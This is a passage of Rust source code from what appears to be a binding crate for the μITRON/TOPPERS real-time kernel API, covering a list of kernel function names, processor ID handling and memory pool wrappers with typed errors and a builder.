/// One [`Func`](super::Func) constant per known kernel API function name,
/// plus [`ALL_NAMES`](known_funcs::ALL_NAMES) listing every name.
pub mod known_funcs {
    // Expands each identifier into a `Func` constant of the same name and
    // collects all names into `ALL_NAMES`.
    macro_rules! funcs {
        (
            $($name:ident,)*
        ) => {
            $(
                pub const $name: super::Func = super::Func {
                    name: stringify!($name),
                };
            )*

            /// Every known function name, in declaration order.
            pub const ALL_NAMES: &[&str] = &[
                $(stringify!($name)),*
            ];
        };
    }

    // All known function names
    funcs! {
        // Please sort these in a lexicographical order
        acre_alm,
        acre_alm_ngk,
        acre_cyc,
        acre_cyc_ngk,
        acre_dtq,
        acre_flg,
        acre_isr,
        acre_mbf,
        acre_mpf,
        acre_mtx,
        acre_pdq,
        acre_sem,
        acre_spn,
        acre_tsk,
        act_tsk,
        adj_tim,
        can_act,
        can_wup,
        chg_ipm,
        chg_pri,
        chg_spr,
        clr_flg,
        clr_int,
        del_alm,
        del_cyc,
        del_dtq,
        del_flg,
        del_isr,
        del_mbf,
        del_mpf,
        del_mtx,
        del_pdq,
        del_sem,
        del_spn,
        del_tsk,
        dis_dsp,
        dis_int,
        dis_ter,
        dly_tsk,
        ena_dsp,
        ena_int,
        ena_ter,
        exd_tsk,
        ext_ker,
        ext_tsk,
        fch_hrt,
        fsnd_dtq,
        get_inf,
        get_ipm,
        get_lod,
        get_mpf,
        get_nth,
        get_pid,
        get_pri,
        get_tid,
        get_tim,
        get_tst,
        ini_dtq,
        ini_flg,
        ini_mbf,
        ini_mpf,
        ini_mtx,
        ini_pdq,
        ini_sem,
        loc_cpu,
        loc_mtx,
        loc_spn,
        mact_tsk,
        mget_lod,
        mget_nth,
        mig_tsk,
        mrot_rdq,
        msta_alm,
        msta_cyc,
        pget_mpf,
        ploc_mtx,
        pol_flg,
        pol_sem,
        prb_int,
        prcv_dtq,
        prcv_mbf,
        prcv_pdq,
        psnd_dtq,
        psnd_mbf,
        psnd_pdq,
        ras_int,
        ras_ter,
        rcv_dtq,
        rcv_mbf,
        rcv_pdq,
        ref_alm,
        ref_cyc,
        ref_dtq,
        ref_flg,
        ref_mbf,
        ref_mpf,
        ref_mtx,
        ref_ovr,
        ref_pdq,
        ref_sem,
        ref_spn,
        ref_tsk,
        rel_mpf,
        rel_wai,
        rot_rdq,
        rsm_tsk,
        set_flg,
        set_tim,
        sig_sem,
        slp_tsk,
        snd_dtq,
        snd_mbf,
        snd_pdq,
        sns_ctx,
        sns_dpn,
        sns_dsp,
        sns_ker,
        sns_loc,
        sns_ter,
        sta_alm,
        sta_cyc,
        sta_ovr,
        stp_alm,
        stp_cyc,
        stp_ovr,
        sus_tsk,
        ter_tsk,
        tget_mpf,
        tloc_mtx,
        trcv_dtq,
        trcv_mbf,
        trcv_pdq,
        try_spn,
        tslp_tsk,
        tsnd_dtq,
        tsnd_mbf,
        tsnd_pdq,
        twai_flg,
        twai_sem,
        unl_cpu,
        unl_mtx,
        unl_spn,
        wai_flg,
        wai_sem,
        wup_tsk,
        xsns_dpn,
    }
}
<file_sep>/src/processor.rs
//! Multiprocessing
#[allow(unused_imports)]
use core::{convert::TryFrom, fmt, mem::MaybeUninit};
#[allow(unused_imports)]
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
};
define_error_kind! {
    /// Error type for [`current`].
    pub enum CurrentIdError {
        /// The CPU lock state is active.
        #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
        BadContext,
    }
}

impl ErrorKind for CurrentIdError {
    // Categorize a raw error code; codes not produced by `get_pid` map to
    // `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
/// Refers to a single processor in a multi-processor system. The stored
/// processor ID is not guaranteed to be valid but is guaranteed to be non-null.
///
/// In a uniprocessor kernel, this is a zero-sized type.
#[repr(C)]
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct Processor {
    // Present only on multiprocessor kernels; absent otherwise, making the
    // type zero-sized.
    #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
    raw: abi::NonNullID,
    // Prevents construction outside this module.
    _private: (),
}

impl fmt::Debug for Processor {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        // On uniprocessor builds `as_raw()` is `()`, so this prints
        // `Processor(())`.
        write!(f, "Processor({:?})", self.as_raw())
    }
}
#[cfg(not(any(feature = "fmp3", feature = "solid_fmp3")))]
#[cfg_attr(
    feature = "doc_cfg",
    doc(cfg(not(any(feature = "fmp3", feature = "solid_fmp3"))))
)]
impl Processor {
    /// The only processor in a uniprocessor system.
    pub const UNIPROCESSOR: Self = Self { _private: () };

    /// Used by the `Debug` impl
    #[cfg(not(feature = "none"))]
    fn as_raw(self) {}
}
#[cfg(any(feature = "fmp3", feature = "solid_fmp3", feature = "none"))]
#[cfg_attr(
    feature = "doc_cfg",
    doc(cfg(any(feature = "fmp3", feature = "solid_fmp3")))
)]
impl Processor {
    /// Construct `Processor` from a raw processor ID.
    ///
    /// Returns `None` when `raw` is the null ID (zero).
    #[inline]
    pub const fn from_raw(raw: abi::ID) -> Option<Self> {
        // `map` is not `const fn` yet
        if let Some(raw) = abi::NonNullID::new(raw) {
            Some(Self::from_raw_nonnull(raw))
        } else {
            None
        }
    }

    /// Construct `Processor` from a non-null raw processor ID.
    #[inline]
    pub const fn from_raw_nonnull(raw: abi::NonNullID) -> Self {
        match () {
            #[cfg(feature = "none")]
            () => {
                // The "none" backend discards the ID and behaves as a
                // uniprocessor.
                let _ = raw;
                Self::UNIPROCESSOR
            }
            #[cfg(not(feature = "none"))]
            () => Self { raw, _private: () },
        }
    }

    /// Get a raw processor ID.
    #[inline]
    pub const fn as_raw(self) -> abi::ID {
        self.as_raw_nonnull().get()
    }

    /// Get a raw processor ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(self) -> abi::NonNullID {
        match () {
            #[cfg(feature = "none")]
            () => unsafe { abi::NonNullID::new_unchecked(1) },
            #[cfg(not(feature = "none"))]
            () => self.raw,
        }
    }
}
/// The error type returned when a conversion from `usize` to [`Processor`]
/// fails.
///
/// This can occur because of a number of reasons:
///
///  - The specified value is zero, which represents a null value.
///
///  - The specified value does not fit in [`abi::ID`].
///
///  - The target kernel does not support multiple processors, and the supplied
///    value is not `1`.
///
/// Note that an attempt to create a `Processor` representing a non-existent
/// processor is not guaranteed to fail.
#[derive(Debug, Clone, Eq, PartialEq)]
pub struct ProcessorTryFromError(());
impl TryFrom<usize> for Processor {
    type Error = ProcessorTryFromError;

    /// Convert a `usize` into a [`Processor`] on a uniprocessor kernel.
    ///
    /// Only the value `1` is accepted; every other value is rejected.
    #[cfg(not(any(feature = "fmp3", feature = "solid_fmp3")))]
    #[inline]
    fn try_from(x: usize) -> Result<Self, Self::Error> {
        match x {
            1 => Ok(Self::UNIPROCESSOR),
            _ => Err(ProcessorTryFromError(())),
        }
    }

    /// Convert a `usize` into a [`Processor`] on a multiprocessor kernel.
    ///
    /// Fails when the value is zero or does not fit in [`abi::ID`].
    #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
    #[inline]
    fn try_from(x: usize) -> Result<Self, Self::Error> {
        let raw = abi::ID::try_from(x).map_err(|_| ProcessorTryFromError(()))?;
        match Self::from_raw(raw) {
            Some(processor) => Ok(processor),
            None => Err(ProcessorTryFromError(())),
        }
    }
}
/// `get_pid`: Get the current processor's ID.
#[inline]
#[doc(alias = "get_pid")]
pub fn current() -> Result<Processor, Error<CurrentIdError>> {
    match () {
        #[cfg(any(feature = "fmp3", feature = "solid_fmp3"))]
        () => unsafe {
            // `get_pid` fills the out-parameter on success; processor IDs
            // are non-null, hence `new_unchecked`.
            let mut out = MaybeUninit::uninit();
            Error::err_if_negative(abi::get_pid(out.as_mut_ptr()))?;
            Ok(Processor::from_raw_nonnull(abi::NonNullID::new_unchecked(
                out.assume_init(),
            )))
        },
        #[cfg(not(any(feature = "fmp3", feature = "solid_fmp3", feature = "none")))]
        () => {
            // Uniprocessor: no system call is needed.
            Ok(Processor::UNIPROCESSOR)
        }
        #[cfg(feature = "none")]
        () => unimplemented!(),
    }
}
<file_sep>/src/memorypool.rs
//! Memory pools
use core::{fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
    /// Error type for [`MemoryPoolRef::get`].
    pub enum GetError {
        /// The operation is not allowed in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        /// The object ID is out of range or refers to no object
        /// (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Currently compiled out.
        #[cfg(any())]
        AccessDenied,
        /// The wait was forcibly released (`E_RLWAI`).
        #[cfg(not(feature = "none"))]
        Released,
        /// A task termination request was raised (`E_RASTER`).
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        /// The memory pool was deleted while waiting (`E_DLT`).
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
    }
}

impl ErrorKind for GetError {
    // Categorize a raw error code; codes not expected from `get_mpf` map to
    // `None`.
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MemoryPoolRef::get_timeout`].
    pub enum GetTimeoutError {
        /// The operation is not allowed in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        /// The object ID is out of range or refers to no object
        /// (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Currently compiled out.
        #[cfg(any())]
        AccessDenied,
        /// The timeout elapsed before a block became available (`E_TMOUT`).
        #[cfg(not(feature = "none"))]
        Timeout,
        /// The wait was forcibly released (`E_RLWAI`).
        #[cfg(not(feature = "none"))]
        Released,
        /// A task termination request was raised (`E_RASTER`).
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        /// The memory pool was deleted while waiting (`E_DLT`).
        #[cfg(all(not(feature = "none"), feature = "dcre"))]
        Deleted,
    }
}

impl ErrorKind for GetTimeoutError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // E_PAR is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MemoryPoolRef::try_get`].
    pub enum TryGetError {
        /// The operation is not allowed in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The object ID is out of range or refers to no object
        /// (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Currently compiled out.
        #[cfg(any())]
        AccessDenied,
        /// No free memory block was available (`E_TMOUT`).
        #[cfg(not(feature = "none"))]
        Timeout,
    }
}

impl ErrorKind for TryGetError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MemoryPoolRef::release`].
    pub enum ReleaseError {
        /// The operation is not allowed in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The object ID is out of range or refers to no object
        /// (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Currently compiled out.
        #[cfg(any())]
        AccessDenied,
        /// The supplied memory block does not originate from the memory pool.
        #[cfg(not(feature = "none"))]
        BadParam,
    }
}

impl ErrorKind for ReleaseError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MemoryPoolRef::initialize`].
    pub enum InitializeError {
        /// The operation is not allowed in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The object ID is out of range or refers to no object
        /// (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Currently compiled out.
        #[cfg(any())]
        AccessDenied,
    }
}

impl ErrorKind for InitializeError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MemoryPoolRef::info`].
    pub enum InfoError {
        /// The operation is not allowed in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The object ID is out of range or refers to no object
        /// (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Currently compiled out.
        #[cfg(any())]
        AccessDenied,
    }
}

impl ErrorKind for InfoError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MemoryPool::build`].
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum BuildError {
        /// The operation is not allowed in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Access denied (`E_OACV`). Currently compiled out.
        #[cfg(any())]
        AccessDenied,
        /// The specified parameter is not supported by the kernel.
        ///
        ///  - On TOPPERS/HRP3, automatic allocation of a memory pool data
        ///    storage is not supported (`E_NOSPT`, HRPS0199).
        ///
        #[cfg(any())]
        NotSupported,
        /// Ran out of memory or memory pool IDs, or the specified block size
        /// or capacity does not fit in `uint_t`.
        #[cfg(not(feature = "none"))]
        OutOfMemory,
        /// Bad parameter.
        #[cfg(not(feature = "none"))]
        BadParam,
    }
}

#[cfg(feature = "dcre")]
impl ErrorKind for BuildError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_MACV` is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_NOID | abi::E_NOMEM => Some(Self::OutOfMemory(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_PAR | abi::E_RSATR => Some(Self::BadParam(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MemoryPoolRef::delete`].
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub enum DeleteError {
        /// The operation is not allowed in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The object ID is out of range or refers to no object
        /// (`E_ID`/`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// Access denied (`E_OACV`). Currently compiled out.
        #[cfg(any())]
        AccessDenied,
        /// The object is in a state that disallows deletion (`E_OBJ`).
        #[cfg(not(feature = "none"))]
        BadState,
    }
}

#[cfg(feature = "dcre")]
impl ErrorKind for DeleteError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_OBJ => Some(Self::BadState(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
/// A pointer to a memory block.
///
/// Acquired from [`MemoryPoolRef::get`] and friends; handed back via
/// [`MemoryPoolRef::release`].
pub type Block = *mut u8;

/// Memory pool information returned by [`MemoryPoolRef::info`].
#[derive(Debug, Clone, Copy)]
pub struct Info {
    #[cfg(not(feature = "none"))]
    raw: abi::T_RMPF,
}

impl Info {
    /// Get the number of free memory blocks.
    #[inline]
    pub fn free_block_count(&self) -> usize {
        match () {
            #[cfg(not(feature = "none"))]
            () => self.raw.fblkcnt as usize,
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }

    /// Get the first waiting task's ID.
    ///
    /// Returns `None` when no task is waiting on the pool.
    #[inline]
    pub fn first_waiting_task_id(&self) -> Option<abi::NonNullID> {
        match () {
            #[cfg(not(feature = "none"))]
            () => abi::NonNullID::new(self.raw.wtskid),
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// A borrowed reference to a memory pool.
#[derive(PartialEq, Eq, Clone, Copy)]
pub struct MemoryPoolRef<'a> {
    id: abi::NonNullID,
    // Ties the reference to the lifetime of the (possibly owned) pool.
    _phantom: PhantomData<&'a ()>,
}

impl fmt::Debug for MemoryPoolRef<'_> {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        write!(f, "MemoryPool({})", self.id)
    }
}
/// # Object ID conversion
impl MemoryPoolRef<'_> {
    /// Construct a `MemoryPoolRef` from a raw object ID.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
        Self {
            id,
            _phantom: PhantomData,
        }
    }

    /// Get the raw object ID.
    #[inline]
    pub const fn as_raw(self) -> abi::ID {
        self.id.get()
    }

    /// Get the raw object ID as [`abi::NonNullID`].
    #[inline]
    pub const fn as_raw_nonnull(self) -> abi::NonNullID {
        self.id
    }
}
/// # Management
impl MemoryPoolRef<'_> {
    /// `del_mpf`: Delete the memory pool.
    ///
    /// # Safety
    ///
    /// See [Object ID Wrappers](crate#object-id-wrappers).
    #[inline]
    #[doc(alias = "del_mpf")]
    #[cfg(feature = "dcre")]
    #[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
    pub unsafe fn delete(self) -> Result<(), Error<DeleteError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::del_mpf(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }

    /// `ref_mpf`: Get the memory pool's general information.
    #[inline]
    #[doc(alias = "ref_mpf")]
    pub fn info(self) -> Result<Info, Error<InfoError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                // `ref_mpf` fills the out-parameter on success, so
                // `assume_init` below is only reached when it is initialized.
                let mut pri = MaybeUninit::uninit();
                Error::err_if_negative(abi::ref_mpf(self.as_raw(), pri.as_mut_ptr()))?;
                Ok(Info {
                    raw: pri.assume_init(),
                })
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
/// # Memory Pool Operations
impl MemoryPoolRef<'_> {
    /// `get_mpf`: Acquire a memory block. Blocks the current
    /// task if no free memory blocks are available.
    #[inline]
    #[doc(alias = "get_mpf")]
    pub fn get(self) -> Result<Block, Error<GetError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                // `get_mpf` writes the block pointer on success.
                let mut out = MaybeUninit::uninit();
                Error::err_if_negative(abi::get_mpf(self.as_raw(), out.as_mut_ptr()))?;
                Ok(out.assume_init())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }

    /// `tget_mpf`: Acquire a memory block. Blocks the current
    /// task with timeout if no free memory blocks are available.
    #[inline]
    #[doc(alias = "tget_mpf")]
    pub fn get_timeout(self, tmo: Timeout) -> Result<Block, Error<GetTimeoutError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                let mut out = MaybeUninit::uninit();
                Error::err_if_negative(abi::tget_mpf(
                    self.as_raw(),
                    out.as_mut_ptr(),
                    tmo.as_raw(),
                ))?;
                Ok(out.assume_init())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }

    /// `pget_mpf`: Acquire a memory block. Fails and returns immediately if no
    /// free memory blocks are available.
    #[inline]
    #[doc(alias = "pget_mpf")]
    pub fn try_get(self) -> Result<Block, Error<TryGetError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                let mut out = MaybeUninit::uninit();
                Error::err_if_negative(abi::pget_mpf(self.as_raw(), out.as_mut_ptr()))?;
                Ok(out.assume_init())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }

    /// `rel_mpf`: Return a memory block to the memory pool.
    #[inline]
    #[doc(alias = "rel_mpf")]
    pub fn release(self, block: Block) -> Result<(), Error<ReleaseError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::rel_mpf(self.as_raw(), block))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }

    /// `ini_mpf`: Initialize the memory pool.
    #[inline]
    #[doc(alias = "ini_mpf")]
    pub fn initialize(self) -> Result<(), Error<InitializeError>> {
        match () {
            #[cfg(not(feature = "none"))]
            () => unsafe {
                Error::err_if_negative(abi::ini_mpf(self.as_raw()))?;
                Ok(())
            },
            #[cfg(feature = "none")]
            () => unimplemented!(),
        }
    }
}
#[cfg(feature = "dcre")]
pub use self::owned::*;
#[cfg(feature = "dcre")]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
mod owned {
use super::*;
use crate::wait::QueueOrder;
use core::convert::TryInto;
/// The builder type for [memory pools](MemoryPool).
/// Created by [`MemoryPool::build`].
///
/// Its generic parameters are an implementation detail.
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
#[must_use = "`Builder` creates nothing unless you call `.finish()`"]
pub struct Builder<BlockSize, BlockCount> {
block_size: BlockSize,
block_count: BlockCount,
blkcnt_overflow: bool,
blksz_overflow: bool,
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF,
}
/// Builder field hole types
#[allow(non_camel_case_types)]
#[doc(hidden)]
pub mod builder_hole {
pub struct __block_size_is_not_specified__;
pub struct __block_count_is_not_specified__;
}
impl MemoryPool {
/// `acre_mpf`: Create a builder for `MemoryPool`.
///
/// # Examples
///
/// ```rust,no_run
/// use itron::memorypool::MemoryPool;
/// let pool = MemoryPool::build()
/// .block_size(32)
/// .block_count(4)
/// .finish()
/// .expect("failed to create a memory pool");
///
/// let block = pool.as_ref().get()
/// .expect("failed to allocate a block");
/// pool.as_ref().release(block)
/// .expect("failed to deallocate a block");
/// ```
///
#[inline]
#[doc(alias = "acre_mpf")]
pub fn build() -> Builder<
builder_hole::__block_size_is_not_specified__,
builder_hole::__block_count_is_not_specified__,
> {
Builder {
block_size: builder_hole::__block_size_is_not_specified__,
block_count: builder_hole::__block_count_is_not_specified__,
blkcnt_overflow: false,
blksz_overflow: false,
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF {
mpfatr: abi::TA_NULL,
blkcnt: 0,
blksz: 0,
mpf: core::ptr::null_mut(),
mpfmb: core::ptr::null_mut(),
},
}
}
}
impl<BlockSize, BlockCount> Builder<BlockSize, BlockCount> {
/// (**Mandatory**) Specify the block size.
#[inline]
pub fn block_size(self, value: usize) -> Builder<(), BlockCount> {
let (blksz, blksz_overflow) = match value.try_into() {
Ok(x) => (x, false),
Err(_) => (0, true),
};
Builder {
block_size: (),
block_count: self.block_count,
blksz_overflow,
blkcnt_overflow: self.blkcnt_overflow,
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF { blksz, ..self.raw },
}
}
/// (**Mandatory**) Specify the capacity, measured in number of blocks.
#[inline]
pub fn block_count(self, value: usize) -> Builder<BlockSize, ()> {
let (blkcnt, blkcnt_overflow) = match value.try_into() {
Ok(x) => (x, false),
Err(_) => (0, true),
};
Builder {
block_size: self.block_size,
block_count: (),
blksz_overflow: self.blksz_overflow,
blkcnt_overflow,
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF { blkcnt, ..self.raw },
}
}
/// Specify the queue order. Defaults to `Fifo` when unspecified.
#[inline]
pub fn queue_order(self, value: QueueOrder) -> Self {
Builder {
#[cfg(not(feature = "none"))]
raw: abi::T_CMPF {
mpfatr: value.as_raw_atr(),
..self.raw
},
..self
}
}
}
impl Builder<(), ()> {
/// Create a memory pool using the specified parameters.
#[allow(unused_mut)]
pub fn finish(mut self) -> Result<MemoryPool, Error<BuildError>> {
match () {
#[cfg(not(feature = "none"))]
() => unsafe {
if self.blksz_overflow || self.blkcnt_overflow {
// Safety: `E_NOMEM` is handled by `BuildError`
// (Warning: This is not true for `cfg(feature = "none")`.)
return Err(Error::new_unchecked(ErrorCode::new_unchecked(abi::E_NOMEM)));
}
let id = Error::err_if_negative(abi::acre_mpf(&self.raw))?;
// Safety: We own the memory pool we create
Ok(MemoryPool::from_raw_nonnull(abi::NonNullID::new_unchecked(
id,
)))
},
#[cfg(feature = "none")]
() => unimplemented!(),
}
}
}
/// An owned memory pool.
///
/// [Deletes] the memory pool automatically when dropped. The destructor will
/// panic if the deletion fails.
///
/// [Deletes]: MemoryPoolRef::delete
#[derive(PartialEq, Eq)]
#[cfg_attr(feature = "doc_cfg", doc(cfg(feature = "dcre")))]
pub struct MemoryPool(MemoryPoolRef<'static>);
impl fmt::Debug for MemoryPool {
#[inline]
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
self.0.fmt(f)
}
}
impl Drop for MemoryPool {
#[inline]
fn drop(&mut self) {
unsafe { self.0.delete().unwrap() };
}
}
impl MemoryPool {
/// Construct a `MemoryPool` from a raw object ID.
///
/// # Safety
///
/// See [Object ID Wrappers](crate#object-id-wrappers).
#[inline]
pub const unsafe fn from_raw_nonnull(id: abi::NonNullID) -> Self {
Self(unsafe { MemoryPoolRef::from_raw_nonnull(id) })
}
/// Consume and "leak" `self`, returning a reference `MemoryPoolRef<'a>`.
#[inline]
pub const fn leak<'a>(self) -> MemoryPoolRef<'a> {
let out = self.0;
core::mem::forget(self);
out
}
/// Get the raw object ID.
#[inline]
pub const fn as_raw(&self) -> abi::ID {
self.0.as_raw()
}
/// Get the raw object ID as [` abi::NonNullID`].
#[inline]
pub const fn as_raw_nonnull(&self) -> abi::NonNullID {
self.0.as_raw_nonnull()
}
/// Borrow `MemoryPool` as [`MemoryPoolRef`].
///
/// Use this to perform operations on memory pools because most of the
/// methods are implemented on `MemoryPoolRef` but not `MemoryPool`.
#[inline]
